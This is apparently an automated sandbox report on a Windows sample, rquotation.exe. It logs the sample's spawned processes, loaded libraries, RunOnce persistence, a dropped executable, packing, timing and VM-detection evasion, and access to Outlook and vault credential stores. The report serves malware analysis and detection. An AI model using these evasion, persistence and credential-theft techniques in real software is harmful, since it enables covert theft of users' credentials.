              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rquotation.exe, rquotation.exe, 00000005.00000002.3197320437.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: rquotation.exe, rquotation.exe, 00000006.00000002.3181880318.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: rquotation.exe, 00000004.00000002.3303086999.0000000037360000.00000040.10000000.00040000.00000000.sdmp, rquotation.exe, 00000005.00000002.3197320437.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: rquotation.exe, rquotation.exe, 00000005.00000002.3197320437.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: rquotation.exe, rquotation.exe, 00000005.00000002.3197320437.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: rquotation.exe, rquotation.exe, 00000005.00000002.3197320437.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: rquotation.exe, 00000005.00000002.3197958160.0000000002730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: rquotation.exe, rquotation.exe, 00000005.00000002.3197320437.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: rquotation.exeVirustotal: Detection: 12%
              Source: C:\Users\user\Desktop\rquotation.exeFile read: C:\Users\user\Desktop\rquotation.exeJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_6-33208
              Source: unknownProcess created: C:\Users\user\Desktop\rquotation.exe "C:\Users\user\Desktop\rquotation.exe"
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe "C:\Users\user\Desktop\rquotation.exe"
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\wzmiqiwgxwogvchqnsa"
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\hbrbjahaleglxiduwduflf"
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\jvwtktsbhmyyhorygnhgokcbue"
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exe "C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exe"
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe "C:\Users\user\Desktop\rquotation.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\wzmiqiwgxwogvchqnsa"Jump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\hbrbjahaleglxiduwduflf"Jump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess created: C:\Users\user\Desktop\rquotation.exe C:\Users\user\Desktop\rquotation.exe /stext "C:\Users\user\AppData\Local\Temp\jvwtktsbhmyyhorygnhgokcbue"Jump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeFile written: C:\Users\user\kompatible\Dau\cheilostomata.iniJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeFile opened: C:\Users\user\Desktop\rquotation.cfgJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: rquotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\rquotation.exeUnpacked PE file: 5.2.rquotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\rquotation.exeUnpacked PE file: 6.2.rquotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\rquotation.exeUnpacked PE file: 7.2.rquotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: 00000000.00000002.2997334222.0000000007DDD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3275367033.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2996399559.0000000000563000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2996399559.0000000000578000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rquotation.exe PID: 6648, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Colonialises.exe PID: 5368, type: MEMORYSTR
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_10001A5D LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374B1219 push esp; iretd 4_2_374B121A
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A2806 push ecx; ret 4_2_374A2819
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044693D push ecx; ret 5_2_0044694D
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DB84
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DBAC
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00451D54 push eax; ret 5_2_00451D61
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0A4
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0CC
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_00451D34 push eax; ret 6_2_00451D41
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_00444E71 push ecx; ret 6_2_00444E81
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00414060 push eax; ret 7_2_00414074
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00414060 push eax; ret 7_2_0041409C
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00414039 push ecx; ret 7_2_00414049
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_004164EB push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00416553 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00416555 push 0000006Ah; retf 7_2_004165C4

              Persistence and Installation Behavior

              barindex
              Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate where issuer matches subject exactly, 2) Email domain 'assemblerrutiner.Mu' appears suspicious and non-corporate (.Mu is Mauritius TLD), 3) Organization name 'Paatalemyndighed' is unusual and not a known entity, 4) Certificate validation explicitly failed with untrusted root certificate error, 5) Large time gap between compilation date (2016) and certificate dates (2024-2025) suggests possible certificate manipulation or code resigning, 6) OU field contains strange concatenated words ('Alphitomancy Totalfeltet Gruntling') that appear meaningless, suggesting automated/malicious generation. The combination of an untrusted, self-signed certificate with suspicious naming patterns and validation errors strongly indicates malicious intent.
              Source: C:\Users\user\Desktop\rquotation.exeFile created: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile created: C:\Users\user\AppData\Local\Temp\nss2F16.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\rquotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsn5AC3.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\rquotation.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BridgetsJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BridgetsJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BridgetsJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BridgetsJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_004047CB
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rquotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\rquotation.exeAPI/Special instruction interceptor: Address: 80AC6CF
              Source: C:\Users\user\Desktop\rquotation.exeAPI/Special instruction interceptor: Address: 42EC6CF
              Source: C:\Users\user\Desktop\rquotation.exeRDTSC instruction interceptor: First address: 80518E0 second address: 80518E0 instructions: 0x00000000 rdtsc 0x00000002 cmp edx, ecx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F2DF4F663ADh 0x00000008 test ax, bx 0x0000000b inc ebp 0x0000000c cmp ah, bh 0x0000000e inc ebx 0x0000000f cmp ecx, 3E1FC169h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\rquotation.exeRDTSC instruction interceptor: First address: 42918E0 second address: 42918E0 instructions: 0x00000000 rdtsc 0x00000002 cmp edx, ecx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F2DF53BC49Dh 0x00000008 test ax, bx 0x0000000b inc ebp 0x0000000c cmp ah, bh 0x0000000e inc ebx 0x0000000f cmp ecx, 3E1FC169h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss2F16.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\rquotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn5AC3.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\rquotation.exeAPI coverage: 4.4 %
              Source: C:\Users\user\Desktop\rquotation.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\rquotation.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_0040559B
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_00405FFD FindFirstFileA,FindClose,4_2_00405FFD
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_00402688 FindFirstFileA,4_2_00402688
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_0040559B
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_374A10F1
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 4_2_374A6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_374A6580
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeCode function: 8_2_00405FFD FindFirstFileA,FindClose,8_2_00405FFD
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeCode function: 8_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,8_2_0040559B
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeCode function: 8_2_00402688 FindFirstFileA,8_2_00402688
              Source: C:\Users\user\Desktop\rquotation.exeCode function: 5_2_00418981 memset,GetSystemInfo,5_2_00418981
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Operagoer\Colonialises.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: rquotation.exe, 00000004.00000002.3282295810.00000000063CD000.00000004.00000020.00020000.00000000.sdmp, rquotation.exe, 00000004.00000002.3282295810.00000000063A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: rquotation.exe, 00000000.00000002.2996399559.0000000000518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:h
